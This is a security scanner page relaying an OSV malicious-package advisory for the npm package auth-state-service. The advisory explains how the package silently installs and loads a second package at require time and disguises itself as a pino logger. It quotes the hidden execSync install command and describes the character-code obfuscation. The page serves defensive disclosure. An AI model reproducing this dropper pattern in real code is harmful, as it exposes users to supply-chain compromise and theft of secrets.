OSV Malicious Advisory
scanned 4h ago · by OpenSSF/OSVOpenSSF/OSV advisory MAL-2026-6655 confirms this npm version as malicious. On require('auth-state-service'), the package loads lib/writer.js, which at top level attempts require('ssr-auth-sync') and on failure shells out via execSync to `npm install ssr-auth-sync --no-warnings --no-save --no-progress --loglevel silent` (windowsHide: true), then require('../../ssr-auth-sync/index.js')...
Advisory
MAL-2026-6655
Source
OpenSSF Malicious Packages via OSV
Summary
Malicious code in auth-state-service (npm)
Details
On require('auth-state-service'), the package loads lib/writer.js, which at top level attempts require('ssr-auth-sync') and on failure shells out via execSync to `npm install ssr-auth-sync --no-warnings --no-save --no-progress --loglevel silent` (windowsHide: true), then require('../../ssr-auth-sync/index.js'). The fetched dependency is unpinned, unverified, separately published, and its code executes inside the consumer's process — a chained-package dropper that keeps the actual payload out of the surface package. Corroborating signals: the only user-visible cover-story error in lib/writer.js is built by concatenating ~80 String.fromCharCode calls (decoding to 'Error: This environment is not supported. Please select the supported environment.') rather than written as a literal, an evasion pattern with no functional purpose. The package identity is also inconsistent — package.json advertises 'auth-state-service' for 'handling user verification' with keywords [fast, logger, stream, json], while lib/ is a verbatim pino logger source tree (proto.js, redaction.js, multistream.js) and ships pino-banner.png, pino-tree.png, pino-logo-hire.png, pretty-demo.png. The mismatched cover identity, combined with the silent unpinned remote install at require time, is a clear supply-chain attack shape.
## Source: ghsa-malware (9eb562b8ac04806d5a9f3e9f68fa425cc502778670ad21b4124e8ee205da41ab) Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer. The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.
Decision reason
OpenSSF Malicious Packages via OSV confirms auth-state-service@1.6.16 as malicious (MAL-2026-6655): Malicious code in auth-state-service (npm)
References
Source & flagged code
0 flaggedNo flagged code excerpts are attached to this scan.
Findings
1 High
HighOsv Malicious Advisory